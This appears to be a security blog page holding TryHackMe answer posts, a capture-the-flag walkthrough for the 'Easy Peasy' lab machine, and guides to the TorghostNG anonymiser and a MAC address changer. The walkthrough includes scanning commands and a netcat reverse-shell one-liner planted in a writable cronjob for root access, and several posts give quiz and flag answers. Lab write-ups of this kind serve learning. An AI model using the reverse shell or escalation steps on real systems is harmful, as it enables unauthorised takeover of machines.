-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label network. Show all posts
Showing posts with label network. Show all posts
  • The TCP IP Model in Networking






    The TCP IP Model



    The TCP/IP model is, in many ways, very similar to the OSI model. It's a few years older, and serves as the basis for real-world networking. The TCP/IP model consists of four layers: Application, Transport, Internet and Network Interface. Between them, these cover the same range of functions as the seven layers of the OSI Model. The TCP IP Model in Networking












    You would be justified in asking why we bother with the OSI model if it's not actually used for anything in the real-world. The answer to that question is quite simply that the OSI model (due to being less condensed and more rigid than the TCP/IP model) tends to be easier for learning the initial theory of networking.










    The two models match up something like this:


    The processes of encapsulation and de-encapsulation work in exactly the same way with the TCP/IP model as they do with the OSI model. At each layer of the TCP/IP model a header is added during encapsulation, and removed during de-encapsulation.


    Now let's get down to the practical side of things.


    A layered model is great as a visual aid -- it shows us the general process of how data can be encapsulated and sent across a network, but how does it actually happen?





    When we talk about TCP/IP, it's all well and good to think about a table with four layers in it, but we're actually talking about a suite of protocols -- sets of rules that define how an action is to be carried out. TCP/IP takes its name from the two most important of these: the Transmission Control Protocol (which we touched upon earlier in the OSI model) that controls the flow of data between two endpoints, and the Internet Protocol, which controls how packets are addressed and sent. There are many more protocols that make up the TCP/IP suite; we will cover some of these in later tasks. For now though, let's talk about TCP.


    As mentioned earlier, TCP is a connection-based protocol. In other words, before you send any data via TCP, you must first form a stable connection between the two computers. The process of forming this connection is called the three-way handshake.


    When you attempt to make a connection, your computer first sends a special request to the remote server indicating that it wants to initialise a connection. This request contains something called a SYN (short for synchronise) bit, which essentially makes first contact in starting the connection process. The server will then respond with a packet containing the SYN bit, as well as another "acknowledgement" bit, called ACK. Finally, your computer will send a packet that contains the ACK bit by itself, confirming that the connection has been setup successfully. With the three-way handshake successfully completed, data can be reliably transmitted between the two computers. Any data that is lost or corrupted on transmission is re-sent, thus leading to a connection which appears to be lossless.












    (Credit Kieran Smith, Abertay University, TryHackMe)


    We're not going to go into exactly how this works on a step-to-step level -- not in this room at any rate. It is sufficient to know that the three-way handshake must be carried out before a connection can be established using TCP.



    History:


    It's important to understand exactly why the TCP/IP and OSI models were originally created. To begin with there was no standardisation -- different manufacturers followed their own methodologies, and consequently systems made by different manufacturers were completely incompatible when it came to networking. The TCP/IP model was introduced by the American DoD in 1982 to provide a standard -- something for all of the different manufacturers to follow. This sorted out the inconsistency problems. Later the OSI model was also introduced by the International Organisation for Standardisation (ISO); however, it's mainly used as a more comprehensive guide for learning, as the TCP/IP model is still the standard upon which modern networking is based.




    #1 Which model was introduced first, OSI or TCP/IP?

    ans :- TCP/IP




    #2 Which layer of the TCP/IP model covers the functionality of the Transport layer of the OSI model (Full Name)?

    ANs :- transport



    #3 Which layer of the TCP/IP model covers the functionality of the Session layer of the OSI model (Full Name)?


    Ans :- Application



    #4 The Network Interface layer of the TCP/IP model covers the functionality of two layers in the OSI model. These layers are Data Link, and?.. (Full Name)?

    Ans :- Physical



    #5 Which layer of the TCP/IP model handles the functionality of the OSI network layer?

    Ans :- Internet



    #6 What kind of protocol is TCP?

    Ans :- Connection-based



    #7 What is SYN short for?

    Ans:- Synchronise



    #8 What is the second step of the three way handshake?

    Ans :- SYN/ACK



    #9 What is the short name for the "Acknowledgement" segment in the three-way handshake?

    Ans :-  ACK




    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)




  • Easy Peasy TryHackMe walkthrough






    Easy Peasy


    Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob. Easy Peasy TryHackMe walkthrough


    [Task 1] Enumeration through Nmap


    Deploy the machine attached to this task and use nmap to enumerate it.




    #1 How many ports are open?
     

    nmap -A -Pn -T4 -p- 10.10.158.249 --script vuln






    Ans :-




    #2 What is the version of nginx?






    Ans :-







    #3 What is running on the highest port?


    Ans :-







    Notice we have 3 ports open:

    · 80: nginx 1.16.1

    · 6498: OpenSSH 7.6p1

    · 65524: Apache httpd 2.4.43




    [Task 2] Compromising the machine


    Now you've enumerated the machine, answer questions and compromise it!


    #1 Using GoBuster, find flag 1.


    Now, the fun part begins!

    The questions in this task require us to find hidden pages and files. Hence, we can start directory scan...



    gobuster -e .php,.html,.txt dir -u http://TryHackMeIP/ -w /usr/share/dirb/wordlists/common.txt


    OR



    • -e  : For extension like .php .html .txt
    • dir : For Find a directory
    • -u   : For URL
    • -w  : For wordlists path






    We see robots.txt and a directory named “hidden”. You can check them out, but there is only dead end. For further enumeration, let’s enumerate this “hidden” directory too.



    gobuster -e .php,.html,.txt dir -u http://10.10.158.249/hidden/ -w /usr/share/dirb/wordlists/common.txt







     Yeah, /whatever. Let us check what’s inside its source code, shall we?










     Nice! Our first flag with base64 encode. Let’s decode it with:









    Ans :- 





    #2 Further enumerate the machine, what is flag 2?


    Now we can move on to find our 2nd Flag. Let us run gobuster to find hidden directories again.

    gobuster dir -u http://10.10.137.230:65524/ -w /usr/share/wordlists/dirb/common.txt



    Let’s check the “robots.txt” and notice a hash over there waiting to be cracked.
















    The thing is, we may know it is a md5, but cannot crack. I searched everywhere and found the only website to crack! This is the website:

    https://md5hashing.net/hash



    Just select “Search by all hash types” and have your 2nd Flag!



    Ans :- flag{1m_s3c0nd_fl4g}






    #3 Locate flag 3.


    http://10.10.176.180:65524










    We may think this is the default page but keep scrolling down to see your 3rd Flag without any encryption!









    Ans :-




    #4 What is the hidden directory?


    We are not over with this page so let’s view-source:http://10.10.137.230:65524/







    Notice the hidden tag on line 194. It’s a bit tricky, because it is NOT base64 and online tools won’t help at all. So I tried every decoder on http://icyberchef.com/  OR https://www.better-converter.com/Encoders-Decoders/Base62-Encode  and finally cracked the hash. The output indicated that it was indeed another hidden directory.









    Ans :- 






    #5 Using the file found in the hidden directory, find and crack a password hidden in the file.


    We may now enter the hidden directory on port 65524:






    We notice there is a hash and a picture waiting for us to investigate.

    First, let us crack the hash with https://md5hashing.net/hash again:








    Ans :-



    #6 What is the password to login to the machine via SSH?



    It was a hidden password after all we will use just a bit later. (Or now.)


    Remember the image on the hidden directory? Let’s download it on our desktop to reveal what’s inside…








    Use steghide to extract secrets out of this image and enter the password we just cracked.


    You can install it by:


    apt install steghide


    steghide extract -sf binarycodepixabay.jpg



    Something will be extracted up as a secret text. Inside the text, we notice there is a username (boring) and a password as SSH login, but the password is all binary.








     I used this site to convert the binary to text:

    https://www.rapidtables.com/convert/number/binary-to-ascii.html







    Ans :- 




    #7 What is the user flag?


    Finally, it is time to ssh into this machine and check what’s going on:


    ssh -p 6498 boring10.10.137.230Finally, it is time to ssh into this machine and check what’s going on:


    P.S. Don’t forget the flag -p 6498 because this machine’s ssh port is not 22, but 6498!


    ssh -p 6498 boring@10.10.175.149 -p 6498






    ls -la to see the user.txt waiting for us to be opened.

    cat user.txt


    I searched “rotated online decode” on Google and found this site to decode this:


    https://rot13.com/







    Ans :- 






    #8 What is the root flag?



    To solve the last question, I needed to get a root access. Thanks to the sentence in the description: “Then escalate your privileges through a vulnerable cronjob.” I found the vulnerable cronjob who locates in the /var/www directory. It was a hidden sh file who could be edited and executed. I’ve inserted the following code into the file to get a reverse shell.












    rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc <ip><port> >/tmp/f
















    At the same time, I also started a netcat listener to get my root shell. And after a minute I got it. I used the whoami command to check if I really was root. And yes I was. The root.txt was also a hidden file, so I used the ls -la command to list the hidden files and lastly used the cat command to read it.



    This CTF was pretty fun to do and also pretty hard. I want to thank Kral4 again for this beautiful CTF and make sure to try it out. Thank you for reading.









    Ans :-







    Video Tutorial :-

     

    Part - 1

     

        

     

     

    Part - 2

     

       

     

     

    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


  • TorghostNG - How to anonymize your internet traffic






    So today we will know about the open source tool that helps in keep anonymous, TorghostNG - Make all your internet traffic anonymized with Tor network. This tool is scripted in python language as you can tell -_- you can help us by subscribing to our youtube channel :. Kumar Atul Jaiswal .: before using the too.


    About TorghostNG


    TorghostNG is a tool that make all your internet traffic anonymized through Tor network.

    Rewritten from TorGhost with Python 3.

    TorghostNG was tested on:


    •     Kali Linux
    •     Manjaro
    •     ...
      
      
    Privoxy is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk. Privoxy has a flexible configuration and can be customized to suit individual needs and tastes. It has application for both stand-alone systems and multi-user networks.
    TorghostNG - Make all your internet traffic anonymized with Tor network.

    Before you use TorghostNG


    • For the goodness of Tor network, BitTorrent traffic will be blocked by iptables. Although you can bypass it with some tweaks with your torrent client disappointed_relieved. It's difficult to completely block all torrent traffic.
    • For security reason, TorghostNG is gonna disable IPv6 to prevent IPv6 leaks (it happened to me lmao or whatismyip.live). tor network TorghostNG  - How to anonymize your internet traffic


    Installing TorghostNG


    TorghostNG currently supports:
    •     GNU/Linux distros that based on Arch Linux
    •     GNU/Linux distros that based on Debian/Ubuntu
    •     GNU/Linux distros that based on Fedora, CentOS, RHEL, openSUSE
    •     Solus OS
    •     Void Linux
    •     Anh the elder guy: Slackware
    •     (Too much package managers for one day :v) torghostng

    How To Install ?

    1) git clone https://github.com/githacktools/TorghostNG




    2) ls

    cd TorghostNG

    ls






    3) sudo python3 install.py






    4) sudo python3 torghostng.py







    5) sudo python3 torghostng.py -s -c -id it











    https://www.hackingtruth.in/2020/06/xss-vulnerability-find-in-any-website.html





    Disclaimer

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal


    Video Tutorial :- 

     

  • how to change MAC address with mac changer




    how to change MAC address with mac changer


    MAC (Media Access Control) address spoofing can come useful in many situations. By changing MAC address, one can protect his/her system from system identification bots which look for MAC address to exploit network administrative privileges, fool freely available internet service in order to bypass network access and bandwidth usage restrictions, make system more secure by disguising MAC address or by replacing it with other NICs randomly generated MAC address for security purposes. how to change MAC address with mac changer 


    Sadly, basic network tools are only for changing DHCP settings, switching between different network profiles, ping DNS servers, etc., therefore, you need to use a dedicated tool to change your Network Interface MAC address. Tecnitium MAC address Changer is developed to change your Network Interface Card (NIC) MAC address. You can choose NIC from the given list whose MAC address will replace your original MAC address.





    Technitium MAC Address Changer allows you to change (spoof) Media Access Control (MAC) Address of your Network Interface Card (NIC) instantly. It has a very simple user interface and provides ample information regarding each NIC in the machine. Every NIC has a MAC address hard coded in its circuit by the manufacturer. This hard coded MAC address is used by windows drivers to access Ethernet Network (LAN). This tool can set a new MAC address to your NIC, bypassing the original hard coded MAC address. Technitium MAC Address Changer is a must tool in every security professionals tool box.







    Features



    • Works on Windows 10, 8 & 7 for both 32-bit and 64-bit.
    • Enhanced network configuration presets with IPv6 support allow you to quickly switch between network configurations.
    • Allows complete configuration of any network adapter.
    • Command line options with entire software functionality available. You can select a preset from specified preset file to apply directly.
    • Update network card vendors list feature allows you to download latest vendor data (OUI) from IEEE.org.



    How To Change MAC Address


    1. Starting MAC address changer will list all available network adapters.
    2. Select the adapter you want to change the MAC address. You will get the details of your selection below.
    3. In the Information tab, find the Change MAC Address frame. Enter new MAC address in the field and click Change Now! button. You may even click Random MAC Address button to fill up a randomly selected MAC address from the vendor list available.
    4. To restore the original MAC address of the network adapter, select the adapter, click Restore Original button in the Change MAC Address frame.


    NOTE: This tool cannot change MAC address of Microsoft Network Bridge. Network Bridge will automatically use the original MAC address of the first NIC added into bridge with the first octet of MAC address set to 0x02.




         
    Don't Forget to Subscribe




    Download Technitium MAC Address Changer

    Download All About MAC Address PDF



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.